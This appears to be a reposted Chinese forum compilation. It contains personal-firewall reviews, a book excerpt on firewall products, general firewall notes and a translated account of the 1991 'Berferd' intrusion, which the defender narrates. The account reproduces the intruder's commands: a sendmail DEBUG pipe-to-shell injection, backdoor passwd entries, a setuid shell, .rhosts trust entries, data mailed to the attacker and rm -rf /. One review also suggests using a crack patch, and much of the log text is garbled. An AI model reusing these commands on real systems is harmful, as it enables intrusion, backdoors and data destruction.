[转贴]绝对值得一看的防火墙评论

另外一个大家关心的问题就是装了杀毒软件是否还要加装防火墙的问题，哪款防火墙最好等等～呵呵，其实个人感觉XP SP2自带的防火墙也已经蛮不错了，够用了。如果大家真的有要求的话，我个人认为可以这么做:

1，如果你选择安装的是F-SECURE client security的话，那么这款杀毒软件自带防火墙程序，而且这个防火墙排名欧洲第一，绝对可以了已经。这样你就可以不必再另外安装了，这个选择比较便捷～

2，ZA，也就是ZONEALARM，用户群也蛮多额，ZA功能确实比较强大，但是对普通用户而言还是比较难上手，而且过于严格的规则可能导致上某些论坛出错，而且最新的ZA版本与卡巴斯基有严重冲突，所以卡巴的用户如果要安装ZA防火墙的话还是悠着点，哈哈。实在想尝试的话可以考虑安装5.5版本的，这个稳定。

'

3，OP，也就是outpost，口碑很好，用户对其评价很高，号称世界排名第二的东东，对于广告拦截很有效果，反黑能力也很强悍，网上找个破解补丁可以使用10年，但是可能占用系统资源多一点，配置不高的用户可能上网会感觉有点延迟。而且这款防火墙比较专业，上网过滤的东西也很多，很多网站的图片也被过滤掉，用户可能看的不习惯，所以大家自己看着办吧。

4，Tiny personal firewall pro，tiny防火墙是我用过的防火墙里面感觉技术最为先进的一款，貌似是国外军方防火墙，呵呵。Tiny的规则相当严格和复杂，对于一些刚上手的朋友而言肯定吃不消的，而且tiny防火墙与卡巴的网页扫描功能有冲突，所以这款防火墙是超级强悍，东西绝对是一流的，不怕麻烦的朋友可以尝试安装。

5，Lns，也就是传说中的look'n'stop，号称世界第一的顶级防火墙，只有600多KB，容量很小，系统资源占的很少，但是功能极其强大，只可惜设置超级复杂，很难上手，一般用户还是选择放弃吧，呵呵，虽然有一些别人编订的规则包，但还是不大适合我们使用。

6，天网，相信用的人满天飞，世界排名未知，呵呵，其实是根本埃不到边。天网可以算是一款入门级别的防火墙，和上述5款防火墙最大区别是非常容易上手，根本不需要设置什么东西，拿来就用～普通用户如果怕不装防火墙感觉不安，但又怕设置麻烦的话，干脆就用用天网算了。

国产的瑞星或者天网都会标榜自己的防火墙规则是多么多么丰富，貌似搞的很牛的样子，其实恰恰相反，规则越多防火墙性能越差，比如瑞星几乎天天更新规则，天网更是广告做到声称自己有1000条规则库文件，每次上网，天网防火墙不断闪动红色感叹号，报告XX用户试图连接本机XX端口，该包已被拦截，这个是不是增加你的心里安慰呢,每时每刻都在拦截信息，哪有这么多黑客会盯着你，天网这样做好像有点夸大其词了。其实有这么多规则顶用么,规则一多上网速度就越慢，每个探测端口的信息防火墙就要用近千条规则去衡量，这不傻掉啊～真正一流的防火墙并不需要超级多的规则，也不需要频繁更新，就如卡巴防火墙，虽然界面极其简单，更新也不快，但是一个隐藏模式就足以令国产的瑞星和天网闭嘴～

很多人热衷于做网上安全测试，我也做过几次，后来发现也不能说明什么问题，加装一流防火墙和不装防火墙就一定有本质区别,就拿诺顿安全测试来看，只用XP SP2自带防火墙就可以轻松通过所有测试，全部显示安全。呵呵，装个ZA也是安全，那到底装不装呢,所以大家也不要迷信这些测试网站。自己认为怎么顺手就怎么用好了～

乱七八糟说了这么多，也不知道大家有没有耐心看完额。以上涉及的杀毒软件或者防火墙本人每个都使用过，所以写的内容也是真实的使用体会。大家随便看看吧。如果各位图个方便，不想装其他设置繁琐的防火墙，但又希望系统有最大限度的安全保障的话，可以考虑使用国外的F-Secure Anti-Virus Client Security或者BitDefender Professional，都是杀毒软件，防火墙的组合装。个人更看好F-Secure Anti-Virus Client Security，集合AVP,LIBRA,ORION,DRACO四套杀毒引擎，内置防火墙，反间谍监控程序，可以说各方面功能都比较均衡实在，怕麻烦的朋友们不仿可以考虑一下。但是这个软件只有英文原版的，但是我想英文界面也并非那么令人望而却步吧。

其实对于杀毒软件除了国内的，国外的杀软建议大家都使用英文原版的，那些汉化内核的版本最好别用，bug太多，除了真正出过简体中文版本的，不过我个人还是不喜欢，呵呵。

另外我需要强调一点的就是卡巴其实并不适合每个人，大家应该依照自己的实际情况装杀毒软件，卡巴占用系统资源更象暴发户，所以很容易拖垮电脑，如果自己电脑配置本身就不高，CPU处理器能力也不强，或者内存就256MB那么点，我想还是算了吧，毕竟装了以后你才知道什么叫慢，开了个卡巴，除了得到我系统应该很安全了这样的心里安慰，其他事情都不能做，开个大程序就卡，玩个游戏载入要老半天，这又何苦呢,与其这样，我宁可欣赏飘哥的做法，撒杀毒软件也不装，就搞个防火墙玩玩，毕竟节省资源啊～敢于裸奔电脑上网的用户我就更服帖了～

我写这篇文章就是希望大家不要盲目跟风，卡巴是好卡巴是比较牛，但不是意味着就要一窝蜂都去装卡巴，何必呢，天下杀毒软件如此之多，何必单恋他一个呢,大家说对伐, 参考资料:

下面的文章是节选自《黑客技术大宝库》

"一旦你的PC经过了上面的测试，你就可以再增加一个加强安全的程序了，这种程序有很多，但是目前最热门的是“个人用防火墙”，下面我们讨论的重点也就是如何选择这一类产品。 不管你是否已经使用了公用的防火墙、代理服务器、域名服务器，这些本地的防火墙在你的机器内部监视你的INTERNET数据交换，防止来自黑客的不正常的访问，其中一些还可以监视非正常的数据输出，也就是那种特洛伊木马程序式偷偷摸摸留下的“后门”，在你不知道的情况下，向你的机器发送信息或者获取信息。

我现在使用的个人防火墙是免费而绝妙的ZoneAlarm，虽然它还有一些粗糙，但是它更新很快，最新的版本已经是2.0.26了，而且解决了很多早期版本存在的问题，而且它免费，却比很多售价50美圆的商业产品更有效，例如它是少数能够检测到特洛伊程序的防火墙之一。 Aladdin的eSafe Protect Desktop也加入了类似于防病毒程序的功能，相当于防火墙加沙箱的功能，能够防范决大多数带有恶意的访问，并将它们隔离起来。另外，它们让人满意的是占用很少的系统资源，只有2%而已。它是一个值得注意的产品，售价为30美圆。但是为了与流行的ZoneAlarm抗衡，Aladdin的Protect Desktop现在对个人使用完 全免费，因此很值得试试看，我正在试用，可能它会变成我的新欢哟～

FWProxy是一个简单免费的程序，能够在设定的端口监听进入的TCP连接，检查用户对设备的授权，在远程RAS用户和设定的内部TCP设备之间建立连接，你如果你只需要这个功能，那你可以试试它。

Sybergen Secure Desktop(以前叫SyShield)非常灵活，可以从多方面进行设置，售价为30美圆，它的长处在于安装简单，虽然为数不多的文档让那些迷失在它过多的设置选项中的初学者有些困惑，但是它马上就会出新版本了，以后我们还要介绍。

BlackIce Defender是一个享有盛誉、非常流行的防火墙，花费40美圆就可以获得BlackIce Defender和一年的安全升级。和ZoneAlarm一样，BlackIce也有其显得粗糙的地方，例如它的错误检测警告，几乎让你发生一种错觉，好象你受到外界的攻击是基本不变的，另外文档也不够完善，除非你对防火墙技术和端口分配都非常精通，还有一些用 户对它支持的级别和对错误反应的时间也不满意。看来Networkice这位始作俑者已经被他们的胜利淹没了，很难继续保持原来的状态。这种说法分的另一个佐证是关于Windows 2000，Windows 2000已经推出一段时间了，而BlackIce的站点还在说:“Win2k目前仍然是beta版本，我们目前还不能支持它，检测侵入的部分运行良好，而防火墙部分现在 还不行，我们计划在WIN 2000正式推出时再支持它。”这种情况让人联想到它的安全产品，因为人们总是希望它的内容能够尽量保持最新状态。

如果你到过各种黑客站点和黑客的BBS，你可以看到一个让黑客们又爱又怕的软件，售价为49美圆的ConSeal Private Desktop，他们喜欢在自己的机器上安装这个软件，但又痛恨在所攻击的用户机器上也安装了这个软件。出品它的加拿大公司Signal9刚被McA fee收购，我们还不清楚McAfee的计划是什么，你可以到 上去看看相关信息。 McAfee还刚刚收购了Cybermedia，它的售价为30美圆的防护狗软件是一个很有趣的产品，多种功能兼而有之，病毒检测、隐私保护和在线安全，还包括对恶意ActiveX和Java applets的防护。

而ConSeal的AtGuard，是另一个让黑客爱恨交织的防火墙，刚刚被Symantec收购，现在变成了售价为60美圆的Norton Internet Security 2000的一部分。和它的其他产品相比，AtGuard略显单薄，但是Norton Internet Security 2000是一个安全“巨人”，

虽然它的设置也很麻烦。但是无论如何，AtGuard安全部分的功能仍然使非常出色的，尽管它现在已经被其他产品的光芒掩盖了。

上面介绍的产品都是一些用途广泛功能全面的防护软件，但是还有一些功能比较精细集中的产品:

Jammer，售价为20美圆，专门设计用来防范NetBus和BackOrifice的攻击，如果你的其他安全产品只有一般的防护能力，它倒还是挺有用的;

ProtectX，售价为25美圆，可以同时监视最多20个端口，还可以帮你追踪攻击你的黑客的来源，也是一个享有盛誉的产品，尽管它所能监视的端口数量受到限制，和同类产品相比显得有些不足。

Rainbow Diamond Intrusion Detector，售价为40美圆，在你可能受到侵犯的时候会发出警报，Intrusion Detector直接在机器中监视可疑的网络活动，一旦发现对象，就发出报警。Intrusion Detector还会试图确定攻击你的用户的身份。

TDS-2，售价33美圆，来自澳大利亚的Trojan特洛伊防范系统，对特洛伊有比其他软件更强的检测能力。

哦，你的选择真是太多了，有了这些产品，你的机器的安全级别一定可以到很高的级别。 但是，即使有了上面的这些产品，我们的安全工作还是没有完成，下一步或者是对上述产品的补充，或是对上述产品的替代，另外，还有一个特的措施你可以使用，将你的安全性能提高到一个很高的程度。"

关于防火墙

关于防火墙

1.防火墙英文名为“Firewall”，他是目前一种重要的网络防护设备。从专业角度讲，防火墙是位于两个(或多个)网络间，实施网络之间访问控制的一组组件集合。

)网络边界的设备2)自身可以被攻击3)对某些攻击保护很关于防火墙:1

弱，粗粒度检测，无法防范数据驱动型的攻击

2.防火墙可以使企业内部局域网(LAN)网络与INTernet之间或者其他外部网络相互隔离，限制网络互访，有效的监控了内部网和Internet之间的任何活动，保证了内部网的安全。防火墙可以分为网络层防火墙和应用层防火墙。网络层防火墙就是:可视为一种 IP 封包过滤器，运作在底层的 TCP/IP 协议堆栈上。我们可以以枚举的方式，只允许符合特定规则的封包通过，其余的一概禁止穿越防火墙。这些规则通常可以经由管理员定义或修改，不过某些防火墙设备可能只能套用内置的规则。现在的操作系统及网络设备大多已内置防火墙功能;而应用层防火墙就是:在 TCP/IP 堆栈的“应用层”上运作，您使用浏览器时所产生的数据流或是使用 FTP 时的数据流都是属于这一层。应用层防火墙可以拦截进出某应用程序的所有封包，并且封锁其他的封包(通常是直接将封包丢弃)。理论上，这一类的防火墙可以完全阻绝外部的数据流进到受保护的机器里。

防火墙虽然具有很好的防御作用，但也存在写不足之处，比如:防火墙虽然能对来自外部网络的攻击进行有效的保护，但对于来自网络内部的攻击却无能为力了，很多事实都证明了70%以上的网络问题都来自网络的内部，此外防火墙在防范,,,应用程序时，由于无法全面控制网络应用程序和数剧流缺乏完整的基于会话级别的监控能力，因此很难预防新的未知的攻击。防火墙无法检测加密的Web流量:由于网络防火墙对于加密的SSL流中的数据是不可见的，防火墙无法迅速截获SSL数据流并对其解密，因此无法阻止应用程序的攻击，甚至有些网络防火墙，根本就不提供数据解密的功能。

3(防火墙的防护作用很大，但防火墙的设置，也就是防火墙的应用也会带来一些问题。

防火墙设置的结果是，很多软件第一次运行访问网络时，系统防火墙会提示你是否允许通过;IE主页改变;开机程序的添加都会请示。

它的作用可以抵御网络可能对你造成的攻击、嗅探等，就像一堵墙，横在你的电脑和互联网之间，保护你的电脑。但是，极少数木马也可以利用系统漏洞，越过你的防火墙，同时，防火墙只是一个过滤的程序，并不是百分百正确和安全，可能把对的当成错的，错的当成对的。

防火墙具有很好的保护作用。入侵者必须首先穿越防火墙的安全防线，才能接触目标计算机。你可以将防火墙配置成许多不同保护级别。高级别的保护可能会禁止一些服务，如视频流等，但至少这是你自己的保护选择。

4.防火墙优点:

1)防火墙能强化安全策略。 (2)防火墙能有效地记录Internet上的活动。 (3)防火墙限制暴露用户点。防火墙能够用来隔开网络中一个网段与另一个网段。这样，能够防止影响一个网段的问题通过整个网络传播。(4)防火墙是一个安全策略的检查站。所有进出的信息都必须通过防火墙，防火墙便成为安全问题的检查点，使可疑的访问被拒绝于门外。

防火墙五大功能:

1(允许网络管理员定义一个中心点来防止非法用户进入内部网络。 2(可以很方便地监视网络的安全性，并报警。

3(可以作为部署NAT(Network Address Translation，网络地址变换)的地点，利用NAT技术，将有限的IP地址动态或静态地与内部的IP地址对应起来，用来缓解地址空间短缺的问题。

4(是审计和记录Internet使用费用的一个最佳地点。网络管理员可以在此向管理部门提供Internet连接的费用情况，查出潜在的带宽瓶颈位置，并能够依据本机构的核算模式提供部门级的计费。

5.工作原理:防火墙主要用语对付黑客用的。可以降低中毒几率。要杀毒还得靠杀毒软件

防火墙能增强机构内部网络的安全性。防火墙系统决定了哪些内部服务可以被外界访问;外界的哪些人可以访问内部的服务以及哪些外部服务可以被内部人员访问。防火墙必须只允许授权的数据通过，而且防火墙本身也必须能够免于渗透。

防火墙的用途:

第一就是网络管理功能

第二就是包过滤功能

一般都是基于状态机检测的、检测都是五元组和六元组

瓶颈相对于说就是威胁

例如运算~带来大量的网络威胁

防火墙与因特网安全10

第10章与黑客Berferd 周旋

10.1 引言

遭遇黑客并非愉快的经历。知道的主机不可探测的部分受到侵犯，或者系统增加了几个新的义务系统管理员，也不是件有趣的事情。

但是在我们这里，一个坚实而可靠的网关可以为驾驭黑客提供安全的后盾。William R.

C h e s w i c k 、Steven M. Bellovin、Diana D'Angelo 和Paul Glick与一名志愿者(黑客) 玩了一翻，

C h e s w i c k 讲述了这个故事。

本章的大部分内容取自[ C h e s w i c k , 1992]。我们只是插入了一些体会。后见之明也是一件极好的事情。

正如所有的黑客故事一样，我们从查看日志开始. . . . . .

10.2 不友好的行为

我第一次发现我们的志愿者，是在他通过一条旧的、有争议的路由发起一个典型请求的时候。他想要我们的一份口令文件副本，大概是为了普通的目录攻击。但他试图通过那个过时的sendmail 的D E B U G 漏洞来获取它(请不要和新的s e n d m a i l 的漏洞混淆起来，那可是一个军队) 。

下面的材料取自1 991年1月1 5日的日志，显示了十分不友好的行动：

19:43:10 smtpd: <---220 inet.att.com="">

19:43:14 smtpd: -------> debug

19:43:14 smtpd: DEBUG attempt

19:43:14 smtpd: <---200>

19:43:25 smtpd: -------> mail from:

19:43:25 smtpd: <---503 expecting="">

19:43:34 smtpd: -------> helo

19:43:34 smtpd: HELO from

19:43:34 smtpd: <---250>

19:43:42 smtpd: -------> mail from:

19:43:42 smtpd: <---250>

19:43:59 smtpd: -------> rcpt to:

19:43:59 smtpd: <---501 syntax="" error="" in="" recipient="">

19:44:44 smtpd: -------> rcpt to:<|sed -e="" '1,/^$/'d="" |="" in/sh="" ;="" exit="" 0"="">

19:44:44 smtpd: shell characters:|sed -e '1,/^$/'d | /bin/sh ; exit 0">

19:44:45 smtpd: <---250>

19:44:48 smtpd: -------> data

19:44:48 smtpd: <---354 start="" mail="" input;="" end="" with="">.

19:45:04 smtpd: <---250>

19:45:04 smtpd: /dev/null sent 48 bytes to upas.security

19:45:08 smtpd: -------> quit

19:45:08 smtpd: <--- 221="" inet.att.com="">

19:45:08 smtpd: finished.

这是我们的一次S M T P 会话日志，S M T P 会话通常在两个邮件发送器之间进行。在这个案例里，有一个人在另一端(有意或无意) 键入一些命令到我们的邮件后台守护程序。他试图使用的第一个命令是D E B U G 。当他得到“250 OK”响应时一定很吃惊(实现这次陷阱需要我们邮件发送器中的几行代码，参见第7章。这些代码已纳入UNIX SVR4的邮件发送器中) 。关键的一行是在1 9:44:44时输入的命令rcpt to：。该命令行的尖角括号中的文本通常是邮件接收者的地址。此处包含了一个命令行。当处于调试模式时，s e n d m a i l 通常作为r o o t 来执行该命令行。在我们的案例中，所要求的这条命令被邮寄给了我。真正的邮件信息报文(没有记录下来) 通过管道传送：

sed -e '1,/^$/'d | /bin/sh ; exit 0 "

它剥去邮件报头并把余下的报文作为r o o t 来执行。下面是我记录的两条命令的执行情况，包括一个时间戳：

19:45 mail adrian@embezzle.stanford.edu

19:51 mail adrian@embezzle.stanford.edu

他要我们把口令文件发送给他，估计他会通过一个口令破译程序来破译它。这些刺探都来自E M B E Z Z L E . S T A N F O R D . E D U 站点一个叫a d r i a n 的用户。它们是在美国宣布空袭伊拉克后不到半小时出现的，完全充满了敌意。我怀疑是不是萨达姆雇用的一两个黑客。正巧我在F T P 目录下有一个多余的假口令文件(见图1 -2) ，所以我把它寄了回去，并附上r o o t 的返回地址。我同时还给斯坦福发了邮件通知他们出现了黑客。

第二天早晨，斯坦福的管理员Stephen Hansen给我发来消息。他被黑客问题深深困扰。帐号a d r i a n 被窃取了，并且许多机器被攻击。他和Los Alamos实验室的Tsutomu Shimomura正在开发窃听器以便跟踪那个家伙。当时攻击正从电话连接进入一个终端服务器，因此他们希望在某个地方跟踪到该电话呼叫。

某个站点的大规模黑客攻击通常会刺激产生大规模的反黑客工具，尤其是线路窃

听软件。必须从合法、稳定的数据流中把黑客行为分类出来。德克萨斯州A &M 大学开发了这类工具，见[Safford et al. ，1993b]。

紧接着的那个星期天早上我收到了一封来自法国的邮件：

To: root@research.att.com

Subject: intruder

Date: Sun, 20 Jan 91 15:02:53 +0100

I have just closed an account on my machine

which has been broken by an intruder coming from

embezzle.stanford.edu. He (she) has left a file called

passwd. The contents are:

------------

>From root@research.att.com Tue Jan 15 18:49:13 1991

Received: from research.att.com by embezzle.Stanford.EDU

Tue, 15 Jan 91 18:49:12 -0800

Message-Id: <9101160249.aa26092@embezzle.stanford.edu>

From: root@research.att.com

Date: Tue, 15 Jan 91 21:48 EST

To: adrian@embezzle.stanford.edu

Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:

Daemon: *:1:1:0000-Admin(0000):/:

Bin: *:2:2:0000-Admin(0000):/bin:

Sys: *:3:3:0000-Admin(0000):/usr/v9/src:

Adm: *:4:4:0000-Admin(0000):/usr/adm:

Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:

Nuucp: *:10:10::/usr/spool/uucppublic:/usr/lib/uucp/uucico

Ftp: anonymous:71:14:file transfer:/:no soap

Ches: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh

Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh

Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh

Berferd: dejCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh

Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh

Status: R

------------

Please let me know if you heard of him.

我们的假口令文件已传到了法国！(一个配置错误使我们的邮件发送器把口令文本识别成RFC 822报头行，并相应地仔细修改了格式。每一行的第一个字母变成了大写字母，且第一个冒号后加上了空格。)

10.3 与黑客Berferd 周旋一夜

1月2 0日那天晚上，美国C N N 正在播放海湾战争的激烈战斗。在C N N 耶路撒冷办事处，局长正在寻找防毒面具。飞毛腿导弹正在天空飞行。这时我的黑客回来了：

22:33 finger attempt on berferd

他想确信他的目标没有被日志记录。两分钟后，有人用D E B U G 命令提交了作为r o o t 运行的命令—他想让我们的邮件发送器改变我们的口令文件！

22:36 echo "beferdd::300:1:maybe Beferd:/:/bin/sh" >>/etc/passwd

cp /bin/sh /tmp/shell

chmod 4755 /tmp/shell

从E M B E Z Z L E . S T A N F O R D . E D U 站点又一次连接过来。

我应该怎么办呢？我不想真的把网关的帐号给他。为什么自找麻烦呢？我们没有他的活动的任何击键记录，因此不得不在后来清理整个混乱局面。

五天前，为了给他发送口令文件，我仿真过一个管理得很糟的计算机。我能继续吗？我决定进一步牵制他，看他还想干什么。我可以手工仿真操作系统，但我必须让他知道计算机很慢，因为我没有与MIPS M/120相匹配。同时，这也意味着我必须基于前几天工作时作出的决定，建立一个前后一致的仿真系统。我已有了一个决定，因为那个黑客已收到了一个口令文件：

决定1f t p 口令文件是真正的口令文件。

这里还有两个决定：

决定2网关计算机管理得很糟糕(毕竟，它有D

E B U G 漏洞，并且F T P 目录不应当包含真正的口令文件) 。

决定3网关计算机的速度非常慢。邮件通过网关需要几小时—甚至是整个通宵！

因此，我只是要他相信他已成功地改变了我们的口令文件，但并不想让他实际登录进来。我可以创建一个帐号，但不让它工作。怎么办？

决定4外壳程序不驻留在/ b i n 目录下。让它驻留在别的地方。

这个决定有点傻，主要是由于它与我已经发送给他的口令文件不一致，但我没失去什么。我准备了一个带有少许外壳程序脚本的测试帐号b 。当它被调用时，它会发送邮件，并且里面有一些s l e e p s 命令会减慢发送的速度。程序调用者会看到如下信息：

RISC/os (inet)

login: b

RISC/os (UMIPS) 4.0 inet

Copyright 1986, MIPS Computer Systems

All Rights Reserved

Shell not found

决定3说明了为什么添加口令文件会花掉1 0分钟。在真正的口令文件中，我把帐户b 改成了b e f e r d d 。正当我设置好这些时，我们的朋友又来了：

22:41 echo "bferd ::301:1::/:/bin/sh" >> /etc/passwd

这是另一次计划添加我们的口令文件。由于前面的命令还没有被“执行”，并且他记得我发送给他的文件中的RFC 822空格，所以他必须在登录名后面加空格。尽管他在冒号前而不是在冒号后加了空格，但他确实是个脑袋灵活的家伙。在我设置新的帐号时，他变得不耐烦了：

22:45 talk adrian@embezzle.stand^Hford.edu

talk adrian@embezzle.stanford.edu

决定5我们没有t a l k 命令。

决定6当使用D E B U G 漏洞时，错误不报告给入侵者(无论如何，我相信这是真实的) 。而且，任何错误命令将中断脚本程序的执行，并且阻止同一脚本程序中其余命令的处理。

t a l k 请求来自斯坦福的另外一台计算机。我通知他们，以免他们不知道, 与此同时，检查电视上的飞毛腿导弹。

他已选择攻击b e r f e r d 帐号。这个名字来自一部老电影《Dick Van Dyke》，电影中的J e r r y Van Dyke 叫Dick “B e r f e r d ”，“因为他看起来像一个人”。对于我们的黑客来说，这似乎是一个好名字。(或许这是解决“黑客”/“破译者”这类术语问题的好方案。“昨天晚上一个b e r f e r d 进入了我们的名字服务器计算机. . . ”)

一阵新的刺探开始了，显然B e r f e r d 没有有线电视。

22:48

22:48

22:49

22:51

22:51

22:51Attempt to login with bferd from Tip-QuadA.Stanford.EDUAttempt to login with bferd from Tip-QuadA.Stanford.EDUAttempt to login with bferd from embezzle.Stanford.EDU(Notified Stanford of the use of Tip-QuadA.Stanford.EDU)Attempt to login with bferd from embezzle.Stanford.EDUAttempt to login with bferd from embezzle.Stanford.EDU

2 2:55

2 2:57

2 2:58

2 2:58

2 3:05

2 3:06

2 3:06

2 3:08echo "bfrd ::303:1::/tmp:/bin/sh" >> /etc/passwd(Added bfrd to the real password file.)Attempt to login with bfrd from embezzle.Stanford.EDUAttempt to login with bfrd from embezzle.Stanford.EDUecho "36.92.0.205" >/dev/nullecho "36.92.0.205 embezzle.stanford.edu">>/etc./^H^H^HAttempt to login with guest from rice-chex.ai.mit.eduecho "36.92.0.205 embezzle.stanford.edu" >> /etc/hostsecho "embezzle.stanford.edu adrain">>/tmp/.rhosts明显地，他在试图r l o g i n 到我们的网关计算机。这需要在一些本地文件中有相应的条目。此时，我们没有检测到尝试中的r l o g i n 命令。B e r f e r d 在我们这端也使用了新的工具。

2 3:09

2 3:10

2 3:14Attempt to login with bfrd from embezzle.Stanford.EDUAttempt to login with bfrd from embezzle.Stanford.EDUMail adrian@embezzle.stanford.edu <>

ps -aux|mail adrian@embezzle.stanford.edu

预料中的r l o g i n 试图失败之后，B e r f e r d 想得到我们的i n e t d . c o n f 文件以便知道我们提供了那些服务。我不想给他发送真正的文件，并且产生这个文件太麻烦了。命令构造好了，但我不想执行。

决定7网关计算机具有不确定性(无论如何我们一直怀疑计算机会这样) 。

23:28 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts

echo "embezzle.stanford.edu adrian" >> /tmp/.rhosts

ps -aux|mail adrian@embezzle.stanford.edu

mail adrian@embezzle.stanford.edu <>

我也不想他看到一个p s 命令的输出。幸运的是，他的B S D 系统的p s 命令开关在我们的U N I X 系统V 上不起作用。

这个时候我打电话给C E RT 。由于这是一次持续的攻击，在斯坦福应该有人跟踪它(事实证明，进行一次实际的跟踪需要花费几个星期的时间) 。在这种情况下C E RT 应该如何办？他们打电话给联邦调查局吗？鼓励人举报吗？激活一个国际电话窃听网络吗？他们所要做的是记录并监视发生的任何事情，并且让我与斯坦福的系统管理员保持联系。他们似乎有一个很好的联系表。

与此同时，我在我的终端上开了很多窗口，在不同的日志文件上运行tail -f命令。我可以同时监视R i y a d h 和所有后台守护程序。F T P 上的活动继续着：

Jan 20 23:36:48 inet ftpd: <--- 220="" inet="" ftp="">

Version 4.265 Fri Feb 2 13:39:38 EST 1990) ready.

Jan 20 23:36:55 inet ftpd: ------- > user bfrd^M

Jan 20 23:36:55 inet ftpd: < ---="" 331="" password="" required="" for="">

Jan 20 23:37:06 inet ftpd: ------- > pass^M

Jan 20 23:37:06 inet ftpd: < ---="" 500="" 'pass':="" command="" not="">

Jan 20 23:37:13 inet ftpd: ------- > pass^M

Jan 20 23:37:13 inet ftpd: < ---="" 500="" 'pass':="" command="" not="">

Jan 20 23:37:24 inet ftpd: ------- > HELP^M

Jan 20 23:37:24 inet ftpd: < ---="" 214-="" the="" following="" commands="">

recognized (* =>'s unimplemented).

Jan 20 23:37:24 inet ftpd: < ---="" 214="" direct="" comments="" to="">

Jan 20 23:37:31 inet ftpd: ------- > QUIT^M

Jan 20 23:37:31 inet ftpd: < ---="" 221="">

Jan 20 23:37:31 inet ftpd: Logout, status 0

Jan 20 23:37:31 inet inetd: exit 14437

Jan 20 23:37:41 inet inetd: finger request from 36.92.0.205 pid 14454

Jan 20 23:37:41 inet inetd: exit 14454

23:38

23:48

23:53finger attempt on berferdecho "36.92.0.205 embezzle.stanford.edu">> /etc/hosts.equivmv /usr/etc/fingerd /usr/etc/fingerd.b

cp /bin/sh /usr/etc/fingerd

决定4表明最后一行一定失败，因此，他只是中断了我们仿真计算机上的f i n g e r 服务。我关掉了真正的服务。

23:57 Attempt to login with bfrd from embezzle.Stabford.EDU

23:58 cp /bin/csh /usr/etc/fingerd

c s h 没有在/ b i n 目录下，所以命令“失败”了。

00:07 cp /usr/etc/fingerd.b /usr/etc/fingerd

f i n g e r d 程序又开始运行了。清除B e r f e r d 的日志。好的。

00:14 passwrd bfrt

b f r t

b f r t

现在他正试图更改口令。这决不可能, 因为p a s s w d 命令从/ d e v /t t y 设备读取输入, 而不是从s e n d m a i l 创建的外壳脚本中读取。

0 0:16

0 0:17Attempt to login with bfrd from embezzle.Stanford.EDUe c h o " /b i n /s h " > /t m p /s h e l l

chmod 755 /tmp/shell

chmod 755 /tmp/shell

chmod 4755 /tmp/shell

Attempt to login with bfrd from embezzle.Stabford.EDU

Attempt to login with bfrd from embezzle.Stabford.EDU

Attempt to login with bfrd from embezzle.Stabford.EDU

A t t e m p t t o l o g i n w i t h b f r d f r o m e m b e z z l e. S t a b f o r d. E D U 0 0:190 0:190 0:1900:21 0 0:21

这时我很困了，而此时在中东一个忙碌的夜晚已经结束。我打算在早晨继续观察B e r f e r d ，但是这段时间我不得不暂时关掉我们的仿真计算机。

这样的蹒跚行动有多大效果？引导他继续上圈套固然是一件趣事，但要害在哪

里？Cliff Stoll此前已经做了很好的工作[Stoll, 1989, 1988]，再重复一遍也并不是一件愉快的事。我决定不让他闲下来，可能的话，让斯坦福单独干一会儿。如果他尽力攻击我们的网关，我们一定要争取时间，锁住机器，安装工具并跟踪他。

我决定我的目标是要拖住B e r f e r d ，让他比我在此问题上花费更多的时间。(从这个

意义上说，当我花时间写本章时Berferd 是赢了。)

我需要为关闭网关找一个借口。我找到一个常用的借口：磁盘问题。(我猜想黑客已形成

了基本观点，认为磁盘驱动器实际并不可靠。) 我一直等到B e r f e r d 执行到一个s l e e p 命令，然后发送了一个报文，告诉他，我的计算机出现了磁盘错误，因此将关闭至第二天早晨。这是一台搞研究的计算机，并非产品，我实际上可以推迟到第二天早晨才发送邮件。

大概半个小时之后，就在休息之前，我决定不值得因为B e r f e r d 而关闭深夜的邮件，于是又重新启动了计算机。

后来的一个晚上B e r f e r d 又返回来了。当然，当我去睡觉时他也就走开了，看起来这并没有困扰他。他上钩了。在0 0:40他仍在继续攻击。有关他试图攻击的日志记录十分可怜而乏味，直到下面的命令被提交给r o o t 执行。

01:55 rm -rf /&

哇！现在有名堂了！显然，机器的状态令他感到迷惑，并且他想掩饰痕迹。

我们听到一些黑客声称他们对于入侵的计算机并不进行实际的损坏，而只是想到

处看一看。显然这取决于不同的人和环境。我们查看了B e r f e r d 在其他主机上的的活动日志，在这些计算机上他清除了文件系统。

我们并不希望一个陌生人呆在我的起居室里，即使他脱了鞋。

他又工作了一段时间，直到第二天早晨才放弃。

0 7:12

0 7:14

0 7:17

0 7:19

0 7:23

0 7:25

0 9:41Attempt to login with bfrd from embezzle.Stanford.EDUrm -rf /&finger attempt on berferd/bin/rm -rf /&/bin/rm -rf /&/bin/rm -rf /&Attempt to login with bfrd from embezzle.Stanford.EDUAttempt to login with bfrd from embezzle.Stanford.EDU

10.4 那天以后

决定8sendmail 的D E B U G 漏洞把需要的命令排队执行。

我得控制住我睡觉后他试图执行的所有命令，包括那些试图删除我们所有文件的命令。为了仿真危险的r m 命令，我把机器关掉了一会儿，“清除了”仿真的口令文件，并把来自不幸的系统管理员的一则有关硬盘崩溃的报文放到目录/ e t c /m o t d 目录下。日志显示了队列中其余的命令：

mail adrian@embezzle@stanford.edu <>

mail adrian@embezzle@stanford.edu <>

mail adrian@embezzle@stanford.edu <>

ps -aux|mail adrian@embezzle.stanford.edu

ps -aux|mail adrian@embezzle.stanford.edu

mail adrian@embezzle@stanford.edu <>

我把四个仿真文件邮寄给了他，其中包括既长又无用的/ e t c /h o s t s 文件。我甚至把他在两个p s 命令中直接违背了无差错决定6的错误信息发送给他。

1 3:41

1 3:41

1 4:05

1 6:07

1 6:08下午他仍在那儿工作，一直乱敲着：Attempt to login to inet with bfrd from decaf.Stanford.EDUA t t e m p t t o l o g i n t o i n e t w i t h b f r d f r o m d e c a f. S t a n f o r d. E D U Attempt to login to inet with bfrd from decaf.Stanford.EDUe c h o "bffr ::7007:0::/:/v/bin/sh" >> /etc/o^Hpasswdecho "bffr ::7007:0::/:/v/bin/sh" >> /etc/passwd

